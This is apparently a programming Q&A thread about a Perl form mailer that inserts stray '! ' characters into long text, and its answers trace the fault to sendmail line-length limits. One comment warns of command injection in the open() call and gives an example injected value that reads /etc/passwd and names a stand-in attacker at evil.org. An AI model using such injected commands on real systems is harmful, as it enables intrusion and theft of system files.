# Perl inserts spurious characters into large blocks of text in email

Tags: perl, string, html-email

I am doing maintenence on an online for done in Perl (i have no knowledge in Perl). The details in the form get emailed for someone to handle. The tester came back with this error in the email:

> Large blocks of text have spurious characters inserted.  Triggered at approximately 1961
>   characters in each text field or text area.  An exclamation mark and space are inserted at
>   approx 1961 then a space eight characters later then repeating approximately every 2048 characters.

So I tried to repeat this error, and this is what it returned (characters 1960 - 1970):

> a! defghij

I have no idea what would cause this to occur. The only way I can think to "fix" it would be to do this:

```
if (length($someInput) gt 1500){
    $someInput=substr($someInput, 0, 1500);
}
```

Does anyone know what causes this to happen in Perl, and how i can fix it?

**EDIT**
This is the function that i run every field through. Then it just gets put into the email html.

```
#sanitises and returns the given input
sub sanitiseInput {
    my ($input) = @_;
    $input = trim(param($input));
    $input = HTML::Entities::decode($input);
    $input =~ s/<script[^>]*?>.*?<\/script>//gi; # strip out javascript
    $input =~ s/<style[^>]*?>.*?<\/style>//gi;   # strip out styles
    $input =~ s/<![\s\S]*?--[ \t\n\r]*>//gi;     # strip out multi-line comments
    $input =~ s/&/&amp;/gi;                      # & to &amp;
    $input =~ s/</&lt;/gi;                       # < to &lt;
    $input =~ s/>/&gt;/gi;                       # > to &gt;
    $input =~ s/"/&#34;/gi;                      # " to &#34;
    $input =~ s/'/&#39;/gi;                      # ' to &#39;
    $input =~ s/\r\n/<br>/gi;                    # return and newline to <br>
    $input =~ s/\r/<br>/gi;                      # return to <br>
    $input =~ s/\n/<br>/gi;                      # newline to <br>
    return $input;                               #return the new value
}
```

**EDIT** This is the function the emails the html

```
sub mailer {
    my ($from_eddress, $to_eddress, $subject, $mail_content, $fail_eddress)=@_;
    open(MAIL, "|/usr/sbin/sendmail -f $from_eddress $to_eddress") or print "Cannot fork to mail - $!\n";
    print MAIL "From: $from_eddress\n";
    print MAIL "To: $to_eddress \n";
    print MAIL "Subject: $subject\n";
    if ($fail_eddress != '') { print MAIL "fail-to: $fail_eddress\n"; }
    print MAIL "Content-type: text/html\n\n";
    print MAIL "\n";
    print MAIL "<html><head><style>body, p, th, td {font-size: 0.75em; font-family:  Arial, Helvetica, sans-serif;} a {font-size: 1em; font-family:  Arial, Helvetica, sans-serif;} .large{font-size: 1.2em;} .small{font-size: .8em;} </style></head><body>";
    print MAIL "$mail_content";
    print MAIL "</body></html>";
    close (MAIL);
}
```

Comment: I notice that that is an alphabetical sequence, with `bc` replaced with `! `. It's quite impossible to tell where it comes from without seeing the code.

Comment: the field gets passed into the sanitiseInput function and then put into the email. That's all that happens to it.

Comment: And I assume you have checked the input for this character sequence?

Comment: I see something funky going on here: `$input =~ s/<![\s\S]*? ...` That character class can contain both whitespace and non-whitespace.. or in other words, any character.

Comment: @Timothy Ruhle: Print the line as the second statement of this function.  See if it has ! in it.  Repeat for each line until you find the one where it is added.  Using $input for two different purposes isn't good programming style, but shouldn't be the cause of the problem.

Comment: `my ($input) = @_;` Why put `@_` when you are only using the first value? Is this intentional? `my $input = shift` would be more clear.

Comment: As i said i am compeltely knew to Perl so there might be some things that i do that are considered bad...some of the code i have just copied and pasted from other places. Management wants this done very quickly so i don't really have much time to learn about Perl.

Comment: `HTML::Entities::decode($input);` will replace HTML entities with Unicode characters. Sounds like a likely suspect. I don't know enough about HTML entities to know what could produce that output though.

Comment: `length($someInput) gt 1500` should use `==`, though it happens to work.

Comment: 2048 characters, a power of two, is a suspect number. It points to possibly something going wrong with your I/O buffer or mailer which may be working in blocks of 2048 bytes. Possibly an off-by-one error. How are you reading your input? How are you outputting it? Is the output ok *before* it gets emailed (ie. if you print the text just before it gets emailed, is it ok)?

Comment: @Schwern If i print the html for the email instead of sending it to the mailer function then it is fine. I added the code of our mailer function.

Comment: I don't know if this data comes from an unsafe source, but using an untainted variable inside an `open` statement is risky. Someone could enter `$from_eddress` as `; cat /etc/passwd > sendmail -f badguys@evil.org;`

Comment: I didn't create the method, i am just using it (plus i dont know what all this does). All the variables are being created by me, except some of the $mail_content will have the fields the user entered. P.S. how come bad guys always work at evil.org??? If I was a bad guy I would diguse myself by working at good.org.

Comment: I'd say Schwern is onto something with the off-by-one thing. Some `NULL` character messing things up? I'm stumped, sorry. And, no, the official name is "Evil Organization".

Comment: Thanks for you help, i have aleast made progress....

Comment: So you are saying the only thing you change is `print MAIL "$mail_content"` to, say `print STDERR "$mail_content";` and the output looks good?   Have you tried sending the mail to yourself instead of where-ever it goes by default?

Comment: So its something wrong with sending the email. I agree with Seth, try sending it to yourself.  Its also probable there's some sort of character encoding problem due to hand rolling your email or passing it directly to sendmail or both. Try using Email::Sender or other email sending module instead. http://search.cpan.org/perldoc?Email::Sender::Manual::QuickStart  Also, what is the point of all the mangling?  Since you're stripping out all the HTML tags in sanitizeInput() there's no HTML content in the email but the header.

Answer (score 7, accepted):

I don't think it happens inside your Perl program.

I have seen this before when trying to mail stuff by piping it to sendmail. There's a line length limit in the mail specs, but I actually suspect that sendmail is using a 2048-byte input buffer.

Point is, you are removing all the linebreaks from the input (converting them to `<br>`) before you pipe it to sendmail. Don't. Maybe add this as the last substitution:

```
    $input =~ s/<br>/<br>\r\n/gi;                      # break up the single line
```

(The fact that you get a lower distance to the first `!` than to the next makes me suspect that sendmail counts the leading HTML bits as part of the same line -- the RFC 822 format calls for `\r\n` line breaks).

Also, if a user is likely to input a 3kb rant without linebreaks, you might want to break lines on whitespace instead on original linebreaks.

EDIT: Just noticed that my regexp took away the `<br>` -- brain fart. Better now?

Comment: The reason that i changed line breaks with <br> is becuase it is being sent to a Outlook inbox, which doesn't handle line breaks. Do you know how to change the I/O buffer size, if it is even possible? Is it a perl thing or something else?

Comment: It's fine to have the `<br>` tags in there, if that's needed for Outlook to show the mail properly. As you say, since it's HTML, Outlook properly ignores 'physical' linebreaks, but there's nothing wrong with having them either -- and you need to have `\r\n` linebreaks in there to keep the physical line length down, it's a mail protocol requirement. I don't think there's an option to allow longer lines in sendmail, for the same reason.

Comment: @Timothy Ruhle please see edit, sorry it took so long to spot.

Comment: I think @LHMathies is onto something.

Answer (score 3):

It seems unlikely (impossible) that perl is randomly doing this.  There must either be a bug in the code or in whatever process is feeding the data to perl.

We don't have enough information to speculate further.

Comment: See edit. It's the only thing that gets done to the fields before they are put into the email.

Answer (score 2):

At first glance these regexes look to me like they could lose the first ? character in:

```
$input =~ s/<script[^>]*?>.*?<\/script>//gi; # strip out javascript
$input =~ s/<style[^>]*?>.*?<\/style>//gi;   # strip out styles
$input =~ s/<![\s\S]*?--[ \t\n\r]*>//gi;     # strip out multi-line comments
```

Also, that last regex I listed could be problematic

```
$input =~ s/<![\s\S]*?--[ \t\n\r]*>//gi;     # strip out multi-line comments
```

The \S in [\s\S] could match past the end of a multi-line comment because \S would match on [->] characters.

Comment: The `*?` performs an ungreedy match. A greedy match could go past the end of a multi-line comment, but this one would stop the first time the rest of the regex matches.